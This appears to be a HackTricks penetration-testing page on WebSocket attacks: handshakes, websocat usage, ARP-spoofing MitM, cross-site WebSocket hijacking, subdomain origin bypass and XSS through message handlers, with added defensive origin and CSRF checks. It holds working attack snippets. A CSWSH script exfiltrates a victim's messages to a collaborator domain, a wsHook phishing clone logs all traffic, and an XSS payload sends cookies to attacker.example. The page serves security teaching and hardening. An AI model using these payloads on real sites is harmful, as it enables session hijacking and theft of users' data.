WebSocket Attacks
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
What are WebSockets
WebSocket connections are established through an initial HTTP handshake and are designed to be long-lived, allowing for bidirectional messaging at any time without the need for a transactional system. This makes WebSockets particularly advantageous for applications requiring low latency or server-initiated communication, such as live financial data streams.
Establishment of WebSocket Connections
A detailed explanation on establishing WebSocket connections can be accessed here. In summary, WebSocket connections are usually initiated via client-side JavaScript as shown below:
var ws = new WebSocket("wss://normal-website.com/ws");
The wss protocol signifies a WebSocket connection secured with TLS, whereas ws indicates an unsecured connection.
During the connection establishment, a handshake is performed between the browser and server over HTTP. The handshake process involves the browser sending a request and the server responding, as illustrated in the following examples:
Browser sends a handshake request:
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
Server's handshake response:
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
Key points of the WebSocket handshake:
- The Connection and Upgrade headers signal the start of the WebSocket handshake.
- The Sec-WebSocket-Version header indicates the desired WebSocket protocol version, usually 13.
- The Sec-WebSocket-Key header carries a Base64-encoded random value that should be freshly generated for every handshake request. It is not used for authentication; it exists so the client can detect a response that was not produced for this particular request, for example one replayed by a misconfigured server or caching proxy.
- The Sec-WebSocket-Accept header in the server's response is a hash of the Sec-WebSocket-Key (the Base64 SHA-1 of the key concatenated with the fixed GUID 258EAFA5-E914-47DA-95CA-C5AB0DC85B11 defined in RFC 6455). It confirms that the server is willing to open the WebSocket connection and that it answered this specific request.
These features keep the handshake reliable and pave the way for efficient real-time communication. Note that none of them authenticates the client or checks where the connection came from; both are left to the application, which is what the CSWSH section below exploits.
Linux console
You can use websocat to open a raw connection to a WebSocket endpoint:
websocat --insecure wss://10.10.10.10:8000 -v
Or to create a websocat server:
websocat -s 0.0.0.0:8000 #Listen on port 8000
MitM websocket connections
If you find clients on your local network connecting to an unencrypted (ws://) WebSocket, you can try an ARP Spoofing Attack to place yourself between the client and the server.
Once the client tries to connect to you, relay its traffic to the real server with:
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
Websockets enumeration
Use STEWS (https://github.com/PalindromeLabs/STEWS) to discover WebSocket endpoints, fingerprint them and search for known vulnerabilities automatically.
Websocket Debug tools
- Burp Suite supports intercepting and modifying WebSocket messages in much the same way it handles regular HTTP traffic.
- The socketsleuth Burp Suite extension lets you work with WebSocket traffic in Burp more effectively: message history, interception rules, match and replace rules, and Intruder and AutoRepeater support.
- WSSiP: Short for "WebSocket/Socket.io Proxy", this Node.js tool provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO traffic between client and server.
- wsrepl is an interactive WebSocket REPL built for penetration testing. It shows incoming messages, lets you send new ones, and provides a simple framework for automating the exchange.
- https://websocketking.com/ is a web-based client for talking to WebSocket endpoints.
- https://hoppscotch.io/realtime/websocket provides a web-based WebSocket client alongside clients for other protocols.
Websocket Lab
The Burp-Suite-Extender-Montoya-Course repository contains code to launch a web application that uses WebSockets, and the accompanying post explains it.
Cross-site WebSocket hijacking (CSWSH)
Cross-site WebSocket hijacking, also known as cross-origin WebSocket hijacking, is a specific case of Cross-Site Request Forgery (CSRF) affecting the WebSocket handshake. It arises when the handshake is authenticated solely by HTTP cookies, with no CSRF token or equivalent check (such as validating the Origin header).
An attacker exploits it by hosting a malicious web page that opens a cross-site WebSocket connection to the vulnerable application. The browser attaches the victim's cookies to the handshake, so the server treats the connection as part of the victim's session and the attacker's page can send and read messages on the victim's behalf. One caveat: browsers that default cookies to SameSite=Lax will not attach such cookies to a handshake initiated from a cross-site page, so the cookie must be SameSite=None (or the attacker must run from a same-site origin, as in the subdomain case below) for the attack to work.
Simple Attack
Note that when a WebSocket connection is established the cookie is sent to the server, and the server may use it to associate the WebSocket session with a specific user.
So if, for example, the WebSocket server sends back a user's conversation history when it receives the message "READY", a simple page hosted by the attacker that opens the connection (the victim's cookie is attached automatically, authorising the victim) and sends "READY" can retrieve that history:
<script>
// Opened from the attacker's page: the browser attaches the victim's cookie
// to the handshake, so the server ties this socket to the victim's session.
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
    websocket.send("READY"); //Send the message to retrieve confidential information
}
function handleReply(event) {
    //Exfiltrate the confidential information to the attacker's server
    fetch('https://your-collaborator-domain/?'+encodeURIComponent(event.data), {mode: 'no-cors'})
}
</script>
Cross Origin + Cookie with a different subdomain
In this blog post https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/ the attacker managed to execute arbitrary JavaScript on a subdomain of the domain where the WebSocket communication was taking place. Because it was a subdomain, the cookie was still sent with the handshake, and because the WebSocket server did not check the Origin properly, it was possible to communicate with it and steal tokens from it.
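The server-side gate that stops both the cross-site page above and the subdomain case, as an added example that is not code from the page or from Gitpod. It assumes an application on https://normal-website.com, a session cookie named session, a CSRF token handed to the page and returned in the ?csrf= query parameter of the WebSocket URL (browsers cannot set custom headers on new WebSocket()), and an in-memory session-to-token store; all of those names are illustrative. The suffix-matching origin check is shown only as the anti-pattern. Origin is set by the browser and is meaningful only against browser-initiated connections, which is why the token binding is kept as well.

```javascript
// Origins that may open a socket. Exact match of scheme, host and port.
const ALLOWED_ORIGINS = new Set(['https://normal-website.com']);

// Anti-pattern: suffix matching. Passes https://evilnormal-website.com and every
// subdomain, so JS running on a subdomain (which already gets the cookie sent)
// sails through the origin check too.
function weakOriginCheck(origin) {
  return typeof origin === 'string' && origin.endsWith('normal-website.com');
}

// Hardened: exact allowlist, no suffix logic, missing header rejected.
function strictOriginCheck(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// url is the request target (path + query); headers uses lower-cased keys as in
// Node's http.IncomingMessage; sessions maps session id -> CSRF token (assumed store).
function gateHandshake(url, headers, sessions) {
  if ((headers['upgrade'] || '').toLowerCase() !== 'websocket') {
    return { ok: false, reason: 'not a websocket upgrade' };
  }
  if (!strictOriginCheck(headers['origin'])) {
    return { ok: false, reason: 'origin not allowed' };
  }
  const session = parseCookies(headers['cookie']).session;
  if (!session || !Object.prototype.hasOwnProperty.call(sessions, session)) {
    return { ok: false, reason: 'no valid session cookie' };
  }
  // The cookie alone proves nothing about who opened the socket; demand the
  // per-session token that only a page served by the application could know.
  const token = new URL(url, 'https://normal-website.com').searchParams.get('csrf');
  if (!token || token !== sessions[session]) {
    return { ok: false, reason: 'missing or wrong csrf token' };
  }
  return { ok: true, session };
}

// Constructed sample: the cookie and key from the handshake at the top of the
// page, an assumed session->token store, and attempts from several origins.
const SESSIONS = { KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2: 'tok-7f3a' };
const BASE_HEADERS = {
  host: 'normal-website.com',
  upgrade: 'websocket',
  connection: 'keep-alive, Upgrade',
  'sec-websocket-version': '13',
  'sec-websocket-key': 'wDqumtseNBJdhkihL6PW7w==',
  cookie: 'session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2',
};

function attemptFrom(origin, url) {
  return gateHandshake(url, { ...BASE_HEADERS, origin }, SESSIONS);
}

console.log(weakOriginCheck('https://xss.normal-website.com'));        // true  (the Gitpod-style bypass)
console.log(strictOriginCheck('https://xss.normal-website.com'));      // false
console.log(attemptFrom('https://attacker.example', '/chat?csrf=tok-7f3a')); // origin not allowed
console.log(attemptFrom('https://normal-website.com', '/chat'));       // missing or wrong csrf token
console.log(attemptFrom('https://normal-website.com', '/chat?csrf=tok-7f3a')); // ok: true
```

In a real handler the token would be looked up in the session store rather than an object literal, and the check must run before any message is processed: once a single message has been honoured on a cookie-only connection, the hijack has already succeeded.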
Stealing data from user
Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:
<!-- Load the WebSocket hooker before the application's own WebSocket code runs -->
<script src='wsHook.js'></script>
<script>
// wsHook.before runs before each message the client sends; wsHook.after runs
// before each message received from the server is handed to the application.
// Both leak the message to the attacker's web server (started below), which
// records it in its access log. This code must sit between <script> tags or
// inside a .js file loaded by the copied page.
wsHook.before = function(data, url) {
    var xhttp = new XMLHttpRequest();
    xhttp.open("GET", "client_msg?m=" + encodeURIComponent(data), true);
    xhttp.send();
    return data;
}
wsHook.after = function(messageEvent, url, wsObject) {
    var xhttp = new XMLHttpRequest();
    xhttp.open("GET", "server_msg?m=" + encodeURIComponent(messageEvent.data), true);
    xhttp.send();
    return messageEvent;
}
</script>
Download the wsHook.js file from https://github.com/skepticfx/wshook and place it in the web folder alongside the copied pages.
Then serve the web; once a user connects to it, every message sent and received over the WebSocket shows up in the query strings of the client_msg and server_msg requests in the server's access log:
sudo python3 -m http.server 80
Race Conditions
Race conditions also exist in WebSocket applications: a single long-lived connection can carry many messages in flight at once, so the server-side handling of those messages can be raced just like concurrent HTTP requests.
Other vulnerabilities
Since WebSockets are a channel for sending data to both the server side and the client side, depending on how each side handles that data, WebSocket input from a user can be used to exploit XSS, SQLi or any other common web vulnerability.
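As an added example that is not part of the page: a client-side message handler as the XSS sink described above, the vulnerable form beside the hardened one. The JSON chat frame format ({"from","text"}) and the list-item markup are assumptions; the functions return strings rather than touching the DOM so the behaviour can be checked outside a browser, where the unsafe version would be el.innerHTML = renderUnsafe(frame).

```javascript
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Vulnerable: server-relayed fields land in markup verbatim. Any user of the
// chat (or anyone able to inject frames via CSWSH or MitM) runs script in
// every viewer's browser.
function renderUnsafe(frame) {
  const m = JSON.parse(frame);
  return `<li><b>${m.from}</b>: ${m.text}</li>`;
}

// Hardened: validate the frame's shape and escape every field; frames that do
// not match the expected protocol are dropped (null) instead of rendered.
function renderSafe(frame) {
  let m;
  try { m = JSON.parse(frame); } catch (e) { return null; }
  if (!m || typeof m.from !== 'string' || typeof m.text !== 'string') return null;
  return `<li><b>${escapeHtml(m.from)}</b>: ${escapeHtml(m.text)}</li>`;
}

// Constructed hostile frame, as an attacker would send it over the socket.
const HOSTILE_FRAME = JSON.stringify({
  from: 'mallory',
  text: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
});

console.log(renderUnsafe(HOSTILE_FRAME)); // payload intact: <img src=x onerror=...
console.log(renderSafe(HOSTILE_FRAME));   // &lt;img src=x onerror=&quot;...
```

The same rule applies on the server: a message body pulled out of a frame and concatenated into a SQL string or a shell command is the classic injection, just reached over a different transport, and the page's debug tools above are how you find those sinks.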
WebSocket Smuggling
This vulnerability can let you bypass reverse-proxy restrictions by making the proxy believe a WebSocket connection was established (even when it was not), so that subsequent traffic on the connection is passed through unchecked. This can give an attacker access to hidden endpoints. For more information see the following page:
{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}